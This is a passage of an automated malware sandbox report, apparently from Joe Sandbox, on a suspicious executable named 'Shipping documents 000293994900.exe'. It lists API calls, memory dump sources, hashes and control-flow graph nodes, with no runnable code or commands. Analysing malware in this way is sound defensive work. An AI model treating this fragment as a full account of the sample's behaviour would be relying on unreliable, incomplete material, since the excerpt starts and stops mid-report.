                                                • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-823278215
                                                • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405135
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
                                                • GlobalFree.KERNEL32(?), ref: 0040383E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-823278215
                                                • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405985
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405995
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-1246513382
                                                • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                APIs
                                                  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloclstrcpy
                                                • String ID:
                                                • API String ID: 852173138-0
                                                • Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                • Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

                                                Execution Graph

                                                Execution Coverage:8.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:28
                                                Total number of Limit Nodes:3
                                                execution_graph 45573 38ca21f8 45574 38ca2220 45573->45574 45577 38ca224c 45573->45577 45575 38ca2229 45574->45575 45578 38ca1764 45574->45578 45579 38ca176f 45578->45579 45580 38ca2543 45579->45580 45582 38ca1780 45579->45582 45580->45577 45583 38ca2578 OleInitialize 45582->45583 45584 38ca25dc 45583->45584 45584->45580 45553 37fe3458 DuplicateHandle 45554 37fe34ee 45553->45554 45555 38ca0040 45556 38ca0089 45555->45556 45557 38ca0082 45555->45557 45557->45556 45558 38ca00da CallWindowProcW 45557->45558 45558->45556 45559 37fed7f0 45560 37fed858 CreateWindowExW 45559->45560 45562 37fed914 45560->45562 45563 37fe3210 45564 37fe3256 GetCurrentProcess 45563->45564 45566 37fe32a8 GetCurrentThread 45564->45566 45567 37fe32a1 45564->45567 45568 37fe32de 45566->45568 45569 37fe32e5 GetCurrentProcess 45566->45569 45567->45566 45568->45569 45572 37fe331b 45569->45572 45570 37fe3343 GetCurrentThreadId 45571 37fe3374 45570->45571 45572->45570

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 659 388d3158-388d3179 660 388d317b-388d317e 659->660 661 388d391f-388d3922 660->661 662 388d3184-388d31a3 660->662 663 388d3948-388d394a 661->663 664 388d3924-388d3943 661->664 671 388d31bc-388d31c6 662->671 672 388d31a5-388d31a8 662->672 665 388d394c 663->665 666 388d3951-388d3954 663->666 664->663 665->666 666->660 668 388d395a-388d3963 666->668 677 388d31cc-388d31db 671->677 672->671 674 388d31aa-388d31ba 672->674 674->677 785 388d31dd call 388d3978 677->785 786 388d31dd call 388d3970 677->786 678 388d31e2-388d31e7 679 388d31e9-388d31ef 678->679 680 388d31f4-388d34d1 678->680 679->668 701 388d34d7-388d3586 680->701 702 388d3911-388d391e 680->702 711 388d35af 701->711 712 388d3588-388d35ad 701->712 714 388d35b8-388d35cb 711->714 712->714 716 388d38f8-388d3904 714->716 717 388d35d1-388d35f3 714->717 716->701 718 388d390a 716->718 717->716 720 388d35f9-388d3603 717->720 718->702 720->716 721 388d3609-388d3614 720->721 721->716 722 388d361a-388d36f0 721->722 734 388d36fe-388d372e 722->734 735 388d36f2-388d36f4 722->735 739 388d373c-388d3748 734->739 740 388d3730-388d3732 734->740 735->734 741 388d37a8-388d37ac 739->741 742 388d374a-388d374e 739->742 740->739 743 388d38e9-388d38f2 741->743 744 388d37b2-388d37ee 741->744 742->741 745 388d3750-388d377a 742->745 743->716 743->722 756 388d37fc-388d380a 744->756 757 388d37f0-388d37f2 744->757 752 388d377c-388d377e 745->752 753 388d3788-388d37a5 745->753 752->753 753->741 759 388d380c-388d3817 756->759 760 388d3821-388d382c 756->760 757->756 759->760 763 388d3819 759->763 764 388d382e-388d3834 760->764 765 388d3844-388d3855 760->765 763->760 766 388d3838-388d383a 764->766 767 388d3836 764->767 769 388d386d-388d3879 765->769 770 388d3857-388d385d 765->770 766->765 767->765 774 388d387b-388d3881 769->774 775 388d3891-388d38e2 769->775 771 388d385f 770->771 772 388d3861-388d3863 770->772 771->769 772->769 776 388d3885-388d3887 774->776 777 388d3883 774->777 775->743 776->775 777->775 785->678 786->678
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: b5fb247958ab17a0861760f728b247bdcd541fe1ced2f0e7f08f2e59f03f39f7
                                                • Instruction ID: 9842f2bd7c6700c7730c5ea0228c46d54720d280107cafb4d2270dbf2038fb42
                                                • Opcode Fuzzy Hash: b5fb247958ab17a0861760f728b247bdcd541fe1ced2f0e7f08f2e59f03f39f7
                                                • Instruction Fuzzy Hash: 29323D35E1071A8FDB15DF79C89459DB7B2BFC9300F60C66AD459A7224EF30A986CB80

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1980 388d7e40-388d7e5e 1981 388d7e60-388d7e63 1980->1981 1982 388d7e65-388d7e7f 1981->1982 1983 388d7e84-388d7e87 1981->1983 1982->1983 1984 388d7e89-388d7ea5 1983->1984 1985 388d7eaa-388d7ead 1983->1985 1984->1985 1986 388d7eaf-388d7ebd 1985->1986 1987 388d7ec4-388d7ec7 1985->1987 1996 388d7ee6-388d7efc 1986->1996 1997 388d7ebf 1986->1997 1989 388d7ec9-388d7ed3 1987->1989 1990 388d7ed4-388d7ed6 1987->1990 1992 388d7edd-388d7ee0 1990->1992 1993 388d7ed8 1990->1993 1992->1981 1992->1996 1993->1992 2000 388d8117-388d8121 1996->2000 2001 388d7f02-388d7f0b 1996->2001 1997->1987 2002 388d7f11-388d7f2e 2001->2002 2003 388d8122-388d8157 2001->2003 2010 388d8104-388d8111 2002->2010 2011 388d7f34-388d7f5c 2002->2011 2006 388d8159-388d815c 2003->2006 2008 388d8391-388d8394 2006->2008 2009 388d8162-388d8171 2006->2009 2012 388d83b7-388d83ba 2008->2012 2013 388d8396-388d83b2 2008->2013 2018 388d8190-388d81d4 2009->2018 2019 388d8173-388d818e 2009->2019 2010->2000 2010->2001 2011->2010 2031 388d7f62-388d7f6b 2011->2031 2015 388d8465-388d8467 2012->2015 2016 388d83c0-388d83cc 2012->2016 2013->2012 2020 388d846e-388d8471 2015->2020 2021 388d8469 2015->2021 2023 388d83d7-388d83d9 2016->2023 2032 388d81da-388d81eb 2018->2032 2033 388d8365-388d837a 2018->2033 2019->2018 2020->2006 2024 388d8477-388d8480 2020->2024 2021->2020 2028 388d83db-388d83e1 2023->2028 2029 388d83f1-388d83f5 2023->2029 2034 388d83e5-388d83e7 2028->2034 2035 388d83e3 2028->2035 2036 388d83f7-388d8401 2029->2036 2037 388d8403 2029->2037 2031->2003 2038 388d7f71-388d7f8d 2031->2038 2046 388d81f1-388d820e 2032->2046 2047 388d8350-388d835f 2032->2047 2033->2008 2034->2029 2035->2029 2041 388d8408-388d840a 2036->2041 2037->2041 2049 388d7f93-388d7fbd 2038->2049 2050 388d80f2-388d80fe 2038->2050 2042 388d840c-388d840f 2041->2042 2043 388d841b-388d8454 2041->2043 2042->2024 2043->2009 2062 388d845a-388d8464 2043->2062 2046->2047 2056 388d8214-388d830a call 388d6670 2046->2056 2047->2032 2047->2033 2063 388d80e8-388d80ed 2049->2063 2064 388d7fc3-388d7feb 2049->2064 2050->2010 2050->2031 2112 388d830c-388d8316 2056->2112 2113 388d8318 2056->2113 2063->2050 2064->2063 2070 388d7ff1-388d801f 2064->2070 2070->2063 2076 388d8025-388d802e 2070->2076 2076->2063 2077 388d8034-388d8066 2076->2077 2085 388d8068-388d806c 2077->2085 2086 388d8071-388d808d 2077->2086 2085->2063 2089 388d806e 2085->2089 2086->2050 2087 388d808f-388d80e6 call 388d6670 2086->2087 2087->2050 2089->2086 2114 388d831d-388d831f 2112->2114 2113->2114 2114->2047 2115 388d8321-388d8326 2114->2115 2116 388d8328-388d8332 2115->2116 2117 388d8334 2115->2117 2118 388d8339-388d833b 2116->2118 2117->2118 2118->2047 2119 388d833d-388d8349 2118->2119 2119->2047
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: ae4d22487d6d1e220731dcb5cb097e34e79757d9194bdf6bfdeca3cf78894b79
                                                • Instruction ID: b4603f744f02f002bf11581074c8e73230f58e36196fdc25b090cfac82d5d36f
                                                • Opcode Fuzzy Hash: ae4d22487d6d1e220731dcb5cb097e34e79757d9194bdf6bfdeca3cf78894b79
                                                • Instruction Fuzzy Hash: 5E02B135B002068FDB18DF64D890A5EB7E6FF84344F508929D819EB795DB35EC4ACB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2121 16e360-16e382 2122 16e3e6-16e3ed 2121->2122 2123 16e384-16e3af 2121->2123 2128 16e3b6-16e3c3 2123->2128 2130 16e3c5-16e3de 2128->2130 2131 16e3ee-16e455 2128->2131 2130->2122 2141 16e457-16e459 2131->2141 2142 16e45e-16e46e 2131->2142 2143 16e6fd-16e704 2141->2143 2144 16e475-16e485 2142->2144 2145 16e470 2142->2145 2147 16e6e4-16e6f2 2144->2147 2148 16e48b-16e499 2144->2148 2145->2143 2151 16e705-16e77e 2147->2151 2153 16e6f4-16e6f8 call 167ad8 2147->2153 2148->2151 2152 16e49f 2148->2152 2152->2151 2154 16e556-16e577 2152->2154 2155 16e697-16e6b2 call 160350 2152->2155 2156 16e6b4-16e6d6 2152->2156 2157 16e530-16e551 2152->2157 2158 16e63e-16e664 2152->2158 2159 16e57c-16e59d 2152->2159 2160 16e5fc-16e639 2152->2160 2161 16e4bd-16e4de 2152->2161 2162 16e6d8-16e6e2 2152->2162 2163 16e4a6-16e4b8 2152->2163 2164 16e5a2-16e5ca 2152->2164 2165 16e4e3-16e505 2152->2165 2166 16e5cf-16e5f7 2152->2166 2167 16e50a-16e52b 2152->2167 2168 16e669-16e695 2152->2168 2153->2143 2154->2143 2155->2143 2156->2143 2157->2143 2158->2143 2159->2143 2160->2143 2161->2143 2162->2143 2163->2143 2164->2143 2165->2143 2166->2143 2167->2143 2168->2143
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xaq$$]q
                                                • API String ID: 0-1280934391
                                                • Opcode ID: 4760bd0d3f7c0908e9fa7fec828299350933de3ac11b175960906ce1bb35f1da
                                                • Instruction ID: d83d8bc09cd06afe6ad99d120642063a1cd59073dd7eeb8dd4445763d6634d51
                                                • Opcode Fuzzy Hash: 4760bd0d3f7c0908e9fa7fec828299350933de3ac11b175960906ce1bb35f1da
                                                • Instruction Fuzzy Hash: 5BB1D334B042589BDB0CAB7C985427E7BA7BFC8710B15866ED446E7384DF38DC029B92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2da5c9306c156994d84c62284bd2ba9fe09f1e988b28e3ed94904958a6948e5
                                                • Instruction ID: 0d6e04bcac4fd6d57bafdf46b5a79380d66b308f79fd973960daf373a41d26ad
                                                • Opcode Fuzzy Hash: e2da5c9306c156994d84c62284bd2ba9fe09f1e988b28e3ed94904958a6948e5
                                                • Instruction Fuzzy Hash: 5353F631D10B1A8ADB11EF68C8946A9F7B1FF99300F51D79AE05877121EB70AAD4CF81
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8795ecb2af88c976c2418f46bda555464dcc04d22d9fa2bde5a06e4e50be0194
                                                • Instruction ID: 4321b10703e4a090b858a4055524aee95dea6ae8e02c6a1ae5de89d030e5a782
                                                • Opcode Fuzzy Hash: 8795ecb2af88c976c2418f46bda555464dcc04d22d9fa2bde5a06e4e50be0194
                                                • Instruction Fuzzy Hash: C4920538A00204CFDB24DF68C584B89B7F2EB49314F5585A9D409AB766DB75EC8ACF50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d678ee04cc8addd78d9f6955c6e340ad6b7911f68b411e625da4f0cb5345bcbe
                                                • Instruction ID: 42ad26ec18b6ea8c7ec1d2960caf1757b5d080a3f911ee28442a93f8eddb09d6
                                                • Opcode Fuzzy Hash: d678ee04cc8addd78d9f6955c6e340ad6b7911f68b411e625da4f0cb5345bcbe
                                                • Instruction Fuzzy Hash: 1F628B34A00208CFEB14EF68D544A9DB7F2EF88354F648529E815EB795DB35EC4ACB80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d52b3388035de37513fcaf9dbf390a734f5fbd10d56fb4d5b717b3c4a72525b9
                                                • Instruction ID: 81820b293ba6df1a530bfcc71c00e6cb1fd4633a43560e912e08a98ab7564a1f
                                                • Opcode Fuzzy Hash: d52b3388035de37513fcaf9dbf390a734f5fbd10d56fb4d5b717b3c4a72525b9
                                                • Instruction Fuzzy Hash: A432AE34B00249DFEB14DB68D980A9EB7B3FB88350F508529E515EB395DB34EC4ACB91
                                                Memory Dump Source
